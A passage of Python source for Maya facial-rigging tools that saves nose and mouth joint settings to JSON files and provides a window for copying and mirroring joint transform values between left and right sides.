        'BoneRange': {jnt: self.joint_cb_list(jnt=jnt) for jnt in nose_joints},
    }
    json_path = "%s/%s.json" % (self.nose_file_folder, module_id)
    with open(json_path, "w") as handle:
        json.dump(payload, handle, indent=2)
    print(u"Nose通道:%s 数据保存成功!" % module_id)
    return
def save_mouth_data_to_json(self):
    """Write the mouth channel data to <mouth_file_folder>/<module_id>.json.

    The payload holds the module 'ID' plus a 'BoneRange' map of
    joint name -> checkbox state list (from joint_cb_list).
    """
    mouth_joints = [
        u'definition_L_LowLipInn_mid',
        u'definition_L_LowLipInn_inner',
        u'definition_L_LowLipInn_outer',
        u'definition_Mouth_L_LowLipInn',
        u'definition_L_LowLipMid_mid',
        u'definition_L_LowLipMid_inner',
        u'definition_L_LowLipMid_outer',
        u'definition_L_LowLipOut_mid',
        u'definition_L_LowLipOut_inner',
        u'definition_L_LowLipOut_outer',
        u'definition_Mouth_L_LowLipOut',
        u'Mouth_C_All_JNT',
        u'definition_Mouth_L_UpLipInn',
        u'definition_L_UpLipInn_outer',
        u'definition_L_UpLipInn_inner',
        u'definition_L_UpLipInn_mid',
        u'definition_Mouth_L_UpLipMid',
        u'definition_L_UpLipMid_outer',
        u'definition_L_UpLipMid_inner',
        u'definition_L_UpLipMid_mid',
        u'definition_Mouth_L_UpLipOut',
        u'definition_L_UpLipOut_outer',
        u'definition_L_UpLipOut_inner',
        u'definition_L_UpLipOut_mid',
        u'definition_Mouth_L_Corner',
        u'definition_Mouth_C_UpLip',
        u'definition_C_UpLip_outer',
        u'definition_C_UpLip_inner',
        u'definition_C_UpLip_mid',
        u'definition_Mouth_C_LowLip',
        u'definition_C_LowLip_outer',
        u'definition_C_LowLip_inner',
        u'definition_C_LowLip_mid',
        u'definition_Mouth_R_UpLipMid',
        u'definition_R_UpLipMid_outer',
        u'definition_R_UpLipMid_inner',
        u'definition_R_UpLipMid_mid',
        u'definition_Mouth_R_UpLipInn',
        u'definition_R_UpLipInn_outer',
        u'definition_R_UpLipInn_inner',
        u'definition_R_UpLipInn_mid',
        u'definition_Mouth_R_UpLipOut',
        u'definition_R_UpLipOut_outer',
        u'definition_R_UpLipOut_inner',
        u'definition_R_UpLipOut_mid',
        u'definition_Mouth_R_Corner',
        u'definition_Mouth_R_LowLipOut',
        u'definition_R_LowLipOut_outer',
        u'definition_R_LowLipOut_inner',
        u'definition_R_LowLipOut_mid',
        u'definition_R_LowLipMid_mid',
        u'definition_R_LowLipMid_inner',
        u'definition_R_LowLipMid_outer',
        u'definition_Mouth_R_LowLipMid',
        u'definition_R_LowLipInn_mid',
        u'definition_R_LowLipInn_inner',
        u'definition_R_LowLipInn_outer',
        u'definition_Mouth_R_LowLipInn',
        u'definition_Mouth_L_LowLipMid',
    ]
    module_id = pm.intFieldGrp(
        self.module_id_field, q=True, value=True)[0]
    payload = {
        'ID': module_id,
        'BoneRange': {jnt: self.joint_cb_list(jnt=jnt) for jnt in mouth_joints},
    }
    json_path = "%s/%s.json" % (self.mouth_file_folder, module_id)
    with open(json_path, "w") as handle:
        json.dump(payload, handle, indent=2)
    print(u"Mouth通道:%s 数据保存成功!" % module_id)
    return
def save_data_to_json(self):
    """Save data for whichever discard child tab is currently selected.

    The 'face' tab has no saver yet, so selecting it is a no-op
    (same as the original if-chain's `pass`).
    """
    tab_names = ['brow', 'eye', 'nose', 'mouth', 'face']
    savers = {
        'brow': self.save_brow_data_to_json,
        'eye': self.save_eye_data_to_json,
        'nose': self.save_nose_data_to_json,
        'mouth': self.save_mouth_data_to_json,
    }
    # tabLayout's selected-tab index is 1-based.
    current_tab_index = pm.tabLayout(
        self.discard_child_tab_layout,
        q=True,
        sti=True) - 1
    handler = savers.get(tab_names[current_tab_index])
    if handler is not None:
        handler()
    return
def join_list_item(list_data):
    """Concatenate *list_data* into one string, prefixing each item with ':'.

    E.g. ``["a", "b"]`` -> ``":a:b"``; an empty list yields ``""``.
    (Debug prints removed; the quadratic ``+=`` loop is replaced by a
    single ``str.join`` pass with identical output.)
    """
    return "".join(":" + item for item in list_data)
class DataPasteHelper(common.Singleton):
    """UI tool that copies channel-box TRS values between joints.

    Workflow: select joints and press the copy button to snapshot their
    translate/rotate/scale values; the paste button then writes those
    values (optionally sign-mirrored per axis) onto joints whose names
    are derived via the search/replace fields.

    Fixes vs. the previous revision:
    - ``convert_check_list`` no longer uses a mutable default argument
      (the old ``[]`` default would have raised IndexError anyway).
    - ``copy_expression`` builds each PyNode once instead of nine times.
    - ``paste_expression`` queries the search/replace fields once,
      outside the loop, instead of once per joint.
    """

    def __init__(self):
        super(DataPasteHelper, self).__init__()
        # joint short name -> [tx, ty, tz, rx, ry, rz, sx, sy, sz] snapshot
        self.expression_data = {}
        # Number of joints captured by the last copy (shown in the UI).
        self.joint_number = 0
        # Target joint names written by the last paste.
        self.target_list = []
        self.show()

    def show(self):
        """Create (or recreate) the helper window and all its controls."""
        if pm.window("ExpressionHelper", ex=True):
            pm.deleteUI("ExpressionHelper")
        pm.window("ExpressionHelper", t=u"数据粘贴助手", mb=True)
        form_layout = pm.formLayout()
        column_layout = pm.columnLayout(adj=1, rs=2)
        # Work mode: mirror / flip / paste (only mirror is implemented).
        self.work_mode_control = pm.radioButtonGrp(
            p=column_layout,
            label=u"工作模式:",
            labelArray3=[u'镜像', u'翻转', u'粘贴'],
            numberOfRadioButtons=3,
            cw4=[60, 60, 60, 60],
            sl=1)
        # Per-axis checkboxes deciding which channels get sign-flipped.
        pm.frameLayout(p=column_layout, label=u"约束轴", mw=5, mh=5, bgs=True)
        self.translate_offset_value = pm.checkBoxGrp(
            label="Translate:",
            numberOfCheckBoxes=3,
            labelArray3=['X', 'Y', 'Z'],
            va3=[True, False, False],
            cw4=[60, 50, 50, 50])
        self.rotate_offset_value = pm.checkBoxGrp(
            label="Rotate:",
            numberOfCheckBoxes=3,
            labelArray3=['X', 'Y', 'Z'],
            va3=[False, True, True],
            cw4=[60, 50, 50, 50])
        self.scale_offset_value = pm.checkBoxGrp(
            label="Scale:",
            numberOfCheckBoxes=3,
            labelArray3=['X', 'Y', 'Z'],
            va3=[False, False, False],
            cw4=[60, 50, 50, 50])
        pm.setParent("..")
        # Search/replace fields that map source joint names to targets.
        self.label_control = pm.text(
            p=column_layout, label=u"搜索和替换选项:", al="left")
        self.search_field_control = pm.textFieldGrp(
            p=column_layout, label=u"搜索:", cw2=[60, 240], text="_L_")
        self.replace_field_control = pm.textFieldGrp(
            p=column_layout, label=u"替换:", cw2=[60, 240], text="_R_")
        self.task_info_control = pm.text(
            p=column_layout,
            label=u"已经复制%s个对象的通道栏数据" % self.joint_number,
            w=300,
            al="left")
        pm.setParent(column_layout)
        self.copy_button = pm.button(
            p=form_layout,
            label=u"复制数据", w=80, c=lambda *args: self.copy_expression())
        self.select_source_button = pm.button(
            p=form_layout,
            label=u"选择来源",
            w=80, c=lambda *args: self.select_source_object())
        self.select_target_button = pm.button(
            p=form_layout,
            label=u"选择目标",
            w=80, c=lambda *args: self.select_target_object())
        self.paste_button = pm.button(
            p=form_layout,
            label=u"拷贝数据", w=80, c=lambda *args: self.paste_expression())
        pm.formLayout(
            form_layout, edit=True,
            attachForm=[
                (column_layout, "top", 10),
                (column_layout, "left", 10),
                (column_layout, "right", 10),
                (self.copy_button, 'left', 10),
                (self.copy_button, 'bottom', 10),
                (self.select_source_button, 'bottom', 10),
                (self.select_target_button, 'bottom', 10),
                (self.paste_button, 'bottom', 10),
                (self.paste_button, 'right', 10),
            ],
            attachControl=[
                (column_layout, 'bottom', 10, self.copy_button),
                (self.select_source_button, 'left', 10, self.copy_button),
                (self.select_target_button, 'left', 10,
                 self.select_source_button),
                (self.paste_button, 'left', 10, self.select_target_button),
            ])
        pm.showWindow("ExpressionHelper")

    def copy_expression(self):
        """Snapshot TRS values (rounded to 5 decimals) of selected joints."""
        self.expression_data = {}
        sel_joints = pm.ls(sl=True)
        for jnt in sel_joints:
            node = pm.PyNode(jnt)  # build the PyNode once per joint
            self.expression_data[jnt.shortName()] = [
                round(node.translateX.get(), 5),
                round(node.translateY.get(), 5),
                round(node.translateZ.get(), 5),
                round(node.rotateX.get(), 5),
                round(node.rotateY.get(), 5),
                round(node.rotateZ.get(), 5),
                round(node.scaleX.get(), 5),
                round(node.scaleY.get(), 5),
                round(node.scaleZ.get(), 5),
            ]
        self.joint_number = len(sel_joints)
        pm.text(self.task_info_control,
                e=True,
                label=u"已经复制%s根骨骼的信息" % self.joint_number)
        return True

    def select_source_object(self):
        """Select the joints the data was copied from."""
        source_objects = self.expression_data.keys()
        pm.select(source_objects)
        return

    def select_target_object(self):
        """Select the joints the data was last pasted onto."""
        target_objects = self.target_list
        pm.select(target_objects)
        return

    def convert_check_list(self, check_list=None):
        """Map three checkbox booleans to sign multipliers.

        True -> -1 (flip that axis), False -> 1 (keep it).
        *check_list* defaults to all-False; a ``None`` sentinel is used
        instead of a mutable default argument.
        """
        if check_list is None:
            check_list = [False, False, False]
        return [-1 if check_list[i] else 1 for i in range(3)]

    def paste_expression(self):
        """Write copied values onto search/replace-renamed target joints.

        Only the 'mirror' mode is implemented: each channel is multiplied
        by the per-axis sign from the checkbox groups before being set.
        """
        work_mode_list = ['mirror', 'flip', 'paste']
        current_mode_index = pm.radioButtonGrp(
            self.work_mode_control, q=True, sl=True)
        work_mode = work_mode_list[current_mode_index - 1]
        translate_offset_value = self.convert_check_list(
            pm.checkBoxGrp(self.translate_offset_value, q=True, va3=True))
        rotate_offset_value = self.convert_check_list(
            pm.checkBoxGrp(self.rotate_offset_value, q=True, va3=True))
        scale_offset_value = self.convert_check_list(
            pm.checkBoxGrp(self.scale_offset_value, q=True, va3=True))
        # Loop-invariant UI queries hoisted out of the per-joint loop.
        search_field = pm.textFieldGrp(
            self.search_field_control, q=True, text=True)
        replace_field = pm.textFieldGrp(
            self.replace_field_control, q=True, text=True)
        self.target_list = []
        for jnt in self.expression_data.keys():
            target_jnt = jnt.replace(search_field, replace_field)
            self.target_list.append(target_jnt)
            value = self.expression_data[jnt]
            if work_mode == 'mirror':
                new_value = [
                    value[0] * translate_offset_value[0],
                    value[1] * translate_offset_value[1],
                    value[2] * translate_offset_value[2],
                    value[3] * rotate_offset_value[0],
                    value[4] * rotate_offset_value[1],
                    value[5] * rotate_offset_value[2],
                    value[6] * scale_offset_value[0],
                    value[7] * scale_offset_value[1],
                    value[8] * scale_offset_value[2]
                ]
                pm.PyNode(target_jnt).translate.set(
                    [new_value[0], new_value[1], new_value[2]])
                pm.PyNode(target_jnt).rotate.set(
                    [new_value[3], new_value[4], new_value[5]])
                pm.PyNode(target_jnt).scale.set(
                    [new_value[6], new_value[7], new_value[8]])
            else:
                # 'flip' and 'paste' modes are not implemented yet.
                pass
        return True
class DataHelper(common.Singleton):
    """Window scaffold for mirroring SDK / attribute data.

    Work in progress: only the SDK search/replace frame and a Mirror
    button are laid out; neither is wired to any behavior yet.
    (A large block of commented-out code copied from DataPasteHelper.show
    was removed — it was dead code.)
    """

    def __init__(self):
        super(DataHelper, self).__init__()
        self.show()

    def sdk_layout(self, parent):
        """Build the SDK mirror frame holding Search/Replace text fields."""
        layout = pm.frameLayout(
            p=parent, label="SDK Mirror Helper", bgs=True, mw=10, mh=10)
        pm.textFieldGrp(label="Search", cw2=[80, 150])
        pm.textFieldGrp(label="Replace", cw2=[80, 150])
        pm.setParent(layout)
        return layout

    def show(self):
        """Create (or recreate) the helper window and lay out its controls."""
        if pm.window("xdDataHelperWnd", ex=True):
            pm.deleteUI("xdDataHelperWnd")
        pm.window(
            "xdDataHelperWnd",
            t=u"数据镜像操作助手",
            mb=True)
        form_layout = pm.formLayout()
        # Work-mode radio buttons: SDK (default) or Attribute.
        work_mode_layout = pm.rowColumnLayout(nr=1, p=form_layout)
        pm.text(label=u"工作模式:")
        collection1 = pm.radioCollection()
        rb1 = pm.radioButton(label='SDK')
        pm.radioButton(label='Attribute')
        pm.setParent('..')
        pm.setParent(work_mode_layout)
        container_layout = pm.columnLayout(adj=1, p=form_layout)
        self.sdk_layout(parent=container_layout)
        pm.setParent(container_layout)
        mirror_btn = pm.button(label="Mirror", p=form_layout)
        # Select the SDK mode by default.
        pm.radioCollection(collection1, edit=True, select=rb1)
        pm.formLayout(
            form_layout, edit=True,
            attachForm=[
                (work_mode_layout, "top", 5),
                (work_mode_layout, "left", 10),
                (work_mode_layout, "right", 10),
                (container_layout, 'left', 10),
                (container_layout, 'right', 10),
                (mirror_btn, 'left', 10),
                (mirror_btn, 'right', 10),
                (mirror_btn, 'bottom', 10),
            ],
            attachControl=[
                (container_layout, 'top', 10, work_mode_layout),
            ])
        pm.showWindow("xdDataHelperWnd")
| [
"jzboylxj@163.com"
] | jzboylxj@163.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.